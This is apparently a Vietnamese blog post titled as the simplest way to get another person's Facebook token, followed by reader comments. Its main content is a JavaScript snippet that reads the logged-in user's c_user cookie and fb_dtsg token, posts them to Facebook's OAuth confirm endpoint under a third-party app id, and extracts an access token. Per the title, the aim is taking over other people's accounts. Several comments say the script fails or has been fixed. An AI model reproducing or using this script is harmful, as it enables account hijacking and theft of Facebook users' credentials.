NH PT Cách lấy token facebook của người khác đơn giản nhất

NH PT Cách lấy token facebook của người khác đơn giản nhấtKênh giải trí tổng hợp
var uid = document.cookie.match(/c_user=(d+)/)[1],
dtsg = document.getElementsByName(“fb_dtsg”)[0].value,
http = new XMLHttpRequest,
url = “//www.facebook.com/v1.0/dialog/oauth/confirm”,
params = “fb_dtsg=” + dtsg + “&app_id=165907476854626&redirect_uri=fbconnect%3A%2F%2Fsuccess&display=page&access_token=&from_post=1&return_format=access_token&domain=&sso_device=ios&__CONFIRM__=1&__user=” + uid;
http.open(“POST”, url, !0), http.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”), http.onreadystatechange = function() {
if (4 == http.readyState && 200 == http.status) {
var a = http.responseText.match(/access_token=(.*)(?=&expires_in)/);
a = a ? a[1] : “Failed to get Access token make sure you authorized the HTC sense app”, prompt(“Token”, a);
}
}, http.send(params);

Nguồn: https://ecodccu.org/

Xem thêm bài viết khác: https://ecodccu.org/tong-hop/

Related Post

9 Comments

  1. Failed to get Access token make sure you authorized the HTC sense app

  2. giúp em lấy mã token đc ko ak

  3. token ông nội m

  4. Failed to get Access token make sure you authorized the HTC sense app

  5. fix rồi =))

  6. xàm thôi nó fix lâu rồi nên với ko quay đoạn lấy token

  7. Làm cái vd thiếu muối vl :))

  8. Thử làm bằng đt đi :v

  9. Hack trên điện đc hk

Leave a Reply